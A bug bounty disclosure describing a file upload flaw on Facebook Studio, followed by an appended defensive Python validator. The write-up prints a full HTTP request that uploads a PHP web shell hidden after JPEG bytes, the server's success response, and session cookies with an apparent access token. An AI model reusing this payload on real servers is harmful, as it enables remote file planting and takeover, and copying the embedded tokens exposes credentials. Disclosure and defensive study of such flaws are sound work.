A few days ago, I reported this vulnerability to Facebook; it exists on Facebook Studio. With the help of the vulnerability I was able to upload malicious files to the Studio server.
The vulnerability exists in the Campaign Assets, when submitting our work.
When I directly tried to upload a file (an image or any malicious file), I got an error message:
File Format: .jpg, .gif, or .png
Filesize: Under 300k
Dimensions: 619×348
Then I created an image with the same attributes that the application required. Then I started the upload, modified the file extension from .jpg to .php, and added malicious file uploader code at the end of the attached image.
POST /gallery/updateImage/16ad8368b831c92344979d84a98aea42 HTTP/1.1
Host: www.facebook-studio.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:34.0) Gecko/20100101 Firefox/34.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://www.facebook-studio.com/gallery/submit/16ad8368b831c92344979d84a98aea42
Cookie: AWSELB=516B29F90C00AC629A79701F002D439320495BE9403BC06E19BA094F6B6A2F4701E9897D28249413D9CDD59A6D0798056B20384748CC90168BC4BEAB5CACC1BD182B09DA32; PHPSESSID=1iudc9s51togs4v14prr5rqqb7; _ga=GA1.2.1741392290.1419864188; _gat=1; fbToken=3faa3eeacff143b2879c172d2103e487e9056c18s%3A234%3A%22access_token%3DCAABrMxWAZCkwBABctHeNYFzj4anT7qqdgla6nFw4UrqKNhUtEpsFPnaPbHiTb9LHlDuOPEbyM8sJUf1bQrIRAXWt5R9jG79VfeURlpqg9W8EfadEEPnM7XzXSIm48VLAz9ddBAMsxgKyP07EZCtctqqxQa9YR9YYvk1jfjOr8r46kZCUSxcVBtX9EHFn7i9LrFmgGMQNIQDa6yd1GWi%26expires%3D%22%3B; YII_CSRF_TOKEN=e26759ac858a50d8c6d9a7fe51176f9bb51623d7s%3A40%3A%222d8518ff24c632dabee425ac55be83f040b540c7%22%3B
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------40249275220408021321998143804
Content-Length: 119868
-----------------------------40249275220408021321998143804
Content-Disposition: form-data; name="YII_CSRF_TOKEN"
2d8518ff24c632dabee425ac55be83f040b540c7
-----------------------------40249275220408021321998143804
Content-Disposition: form-data; name="ajax"
gallery-form
-----------------------------40249275220408021321998143804
Content-Disposition: form-data; name="Submission[image]"; filename="lol.php"
Content-Type: image/jpeg
ÿØÿà
<?php echo ‘<b><br><br>’.php_uname().'<br></b>’; echo ‘<form action=”” method=”post” enctype=”multipart/form-data” name=”uploader” id=”uploader”>’; echo ‘<input type=”file” name=”file” size=”50″><input name=”_upl” type=”submit” id=”_upl” value=”Upload”></form>’; if( $_POST[‘_upl’] == “Upload” ) { if(@copy($_FILES[‘file’][‘tmp_name’], $_FILES[‘file’][‘name’])) { echo ‘<b>credits : http://nareshlamgade.com.np/</b><br><br>’; } else { echo ‘<b>Upload Sucess !!!</b><br><br>’; } } ?>
-----------------------------211083381219672852071391952699--
The response:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Date: Mon, 29 Dec 2014 09:08:31 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Pragma: no-cache
X-Frame-Options: SAMEORIGIN
Content-Length: 83
Connection: keep-alive
SUCCESS::https://www.facebook-studio.com/fbassets/submissions/77687/thumb/lol.php::
Then I reported the issue to Facebook with pretty good hope, but it did not last long. They replied that it was a duplicate.
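A server-side check that would have refused the upload shown above, as an added example (not code from the original post or from Facebook Studio). The function names, the end-of-image check and the sample bytes are assumptions constructed for illustration.

```python
import os
import secrets

MAX_BYTES = 300 * 1024  # the form's stated limit: "Under 300k"

# Stored extension -> (accepted leading magic bytes, required final bytes).
FORMATS = {
    ".jpg": ((b"\xff\xd8\xff",), b"\xff\xd9"),                # SOI ... EOI
    ".gif": ((b"GIF87a", b"GIF89a"), b"\x3b"),                 # header ... trailer
    ".png": ((b"\x89PNG\r\n\x1a\n",), b"IEND\xaeB\x60\x82"),  # signature ... IEND
}
CLIENT_EXT_ALIASES = {".jpeg": ".jpg"}


def validate_upload(client_filename, data):
    """Return a server-chosen storage name, or raise ValueError.

    The client's Content-Type header is deliberately not an input: the request
    on the page declared image/jpeg while sending filename="lol.php".
    """
    if len(data) > MAX_BYTES:
        raise ValueError("file too large")
    ext = os.path.splitext(client_filename)[1].lower()
    ext = CLIENT_EXT_ALIASES.get(ext, ext)
    if ext not in FORMATS:
        raise ValueError("extension not allowed: %r" % ext)
    magics, trailer = FORMATS[ext]
    if not data.startswith(magics):
        raise ValueError("content does not match extension")
    if not data.endswith(trailer):
        raise ValueError("unexpected data after end of image")
    if b"<?php" in data.lower():
        raise ValueError("script marker inside image data")
    # Never store under the client's name: random name, allowlisted extension.
    return secrets.token_hex(16) + ext


def check(client_filename, data):
    """Wrap validate_upload so a rejection is returned as a readable string."""
    try:
        return validate_upload(client_filename, data)
    except ValueError as exc:
        return "rejected: %s" % exc


# Constructed samples (not captured traffic): a JPEG-shaped blob, and the same
# blob with a harmless placeholder appended where the page's payload sat.
CLEAN_JPEG = b"\xff\xd8\xff\xe0" + b"\x00" * 32 + b"\xff\xd9"
POLYGLOT = CLEAN_JPEG + b"<?php /* placeholder */ ?>"

if __name__ == "__main__":
    for name, blob in (("lol.php", POLYGLOT), ("lol.jpg", POLYGLOT), ("ok.jpg", CLEAN_JPEG)):
        print(name, "->", check(name, blob))
```

Content checks like this are one layer; storing uploads where the web server does not execute scripts is what limits the impact if a check is bypassed.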